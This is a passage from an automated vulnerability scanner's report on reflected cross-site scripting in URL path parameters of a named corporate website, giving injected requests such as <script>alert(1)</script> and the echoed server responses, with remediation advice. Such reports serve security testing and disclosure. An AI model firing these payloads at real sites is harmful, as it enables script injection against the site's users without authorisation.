The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5d15"%3b6749ae997ff was submitted in the REST URL parameter 1. This input was echoed as b5d15";6749ae997ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesb5d15"%3b6749ae997ff/1002a2a4-111-Data+and+IP+Services.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:21:05 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesb5d15";6749ae997ff/1002a2a4-111-Data+and+IP+Services.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.678. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a4-111-Data+and+IP+Services.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 584bb'%3b47cded357ea was submitted in the REST URL parameter 1. This input was echoed as 584bb';47cded357ea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources584bb'%3b47cded357ea/1002a2a4-111-Data+and+IP+Services.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources584bb';47cded357ea/1002a2a4-111-Data+and+IP+Services.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.679. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a4-111-Data+and+IP+Services.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7877'%3b927bc5f308e was submitted in the REST URL parameter 2. This input was echoed as c7877';927bc5f308e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/c7877'%3b927bc5f308e HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40212
Date: Wed, 17 Nov 2010 00:23:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/c7877';927bc5f308e'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.680. http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a4-111-Data+and+IP+Services.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84dc9</script><script>alert(1)</script>01dab82d99f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a4-111-Data+and+IP+Services.xml84dc9</script><script>alert(1)</script>01dab82d99f HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "4c3d21cd192ad801c754a5b4e12b69f6"
Last-Modified: Wed, 17 Nov 2010 00:23:12 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:23:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d31be2b7a-81e2-43cc-813d-39ab7bb20373|VTID%3dba6fec21-057f-46c1-9357-4ccfb442f2ab|SX%3d1289954591|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:26:55 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:23:12 GMT
Content-Length: 75917

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<url>/resources/1002a2a4-111-Data+and+IP+Services.xml84dc9</script><script>alert(1)</script>01dab82d99f</url>
...[SNIP]...

1.681. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a6-111-Internet+Access.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72785'%3ba3f9ba49e60 was submitted in the REST URL parameter 1. This input was echoed as 72785';a3f9ba49e60 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources72785'%3ba3f9ba49e60/1002a2a6-111-Internet+Access.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources72785';a3f9ba49e60/1002a2a6-111-Internet+Access.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.682. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a6-111-Internet+Access.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffc79"%3b90aac038efd was submitted in the REST URL parameter 1. This input was echoed as ffc79";90aac038efd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesffc79"%3b90aac038efd/1002a2a6-111-Internet+Access.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesffc79";90aac038efd/1002a2a6-111-Internet+Access.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.683. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a6-111-Internet+Access.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e901'%3ba4e41b5ce93 was submitted in the REST URL parameter 2. This input was echoed as 8e901';a4e41b5ce93 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/8e901'%3ba4e41b5ce93 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:24:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/8e901';a4e41b5ce93'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.684. http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a6-111-Internet+Access.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4f42</script><script>alert(1)</script>b6ddef0d89a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a6-111-Internet+Access.xmld4f42</script><script>alert(1)</script>b6ddef0d89a HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "27fd8fb8cb81a48d3bcf993c35eeb518"
Last-Modified: Wed, 17 Nov 2010 00:23:59 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:23:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d0348f92e-6da5-43cc-b706-e9939b2995c5|VTID%3d71a9e27c-d3e4-4679-a4f3-a41643f7ebfe|SX%3d1289954639|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:27:43 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:23:59 GMT
Content-Length: 33524

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a6-111-Internet+Access.xmld4f42</script><script>alert(1)</script>b6ddef0d89a</url>
...[SNIP]...

1.685. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a7-111-IT+Solutions+and+Hosting.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 801ab"%3b3b4888328d was submitted in the REST URL parameter 1. This input was echoed as 801ab";3b4888328d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources801ab"%3b3b4888328d/1002a2a7-111-IT+Solutions+and+Hosting.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:06 GMT
Content-Type: text/html
Content-Length: 40680
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources801ab";3b4888328d/1002a2a7-111-IT+Solutions+and+Hosting.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION
...[SNIP]...

1.686. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a7-111-IT+Solutions+and+Hosting.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 661fe'%3b0bd7afdc749 was submitted in the REST URL parameter 1. This input was echoed as 661fe';0bd7afdc749 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources661fe'%3b0bd7afdc749/1002a2a7-111-IT+Solutions+and+Hosting.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:23:34 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources661fe';0bd7afdc749/1002a2a7-111-IT+Solutions+and+Hosting.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.687. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a7-111-IT+Solutions+and+Hosting.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20be9'%3b5db6709c870 was submitted in the REST URL parameter 2. This input was echoed as 20be9';5db6709c870 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/20be9'%3b5db6709c870 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/20be9';5db6709c870'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.688. http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a7-111-IT+Solutions+and+Hosting.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd75a</script><script>alert(1)</script>6c2d087a617 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a7-111-IT+Solutions+and+Hosting.xmldd75a</script><script>alert(1)</script>6c2d087a617 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "0a4249db00ac2d4adf123638e011194e"
Last-Modified: Wed, 17 Nov 2010 00:26:19 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d4ec9dfb7-b8b3-4ea6-8748-f3928c7a2506|VTID%3d961d5a18-2eba-4f86-b217-f4aa9a0ff756|SX%3d1289954779|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:03 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:19 GMT
Content-Length: 70790

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a7-111-IT+Solutions+and+Hosting.xmldd75a</script><script>alert(1)</script>6c2d087a617</url>
...[SNIP]...

1.689. http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a8-111-Managed+Networks.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb4e7"%3b535fc5b796a was submitted in the REST URL parameter 1. This input was echoed as cb4e7";535fc5b796a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcescb4e7"%3b535fc5b796a/1002a2a8-111-Managed+Networks.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:23:54 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
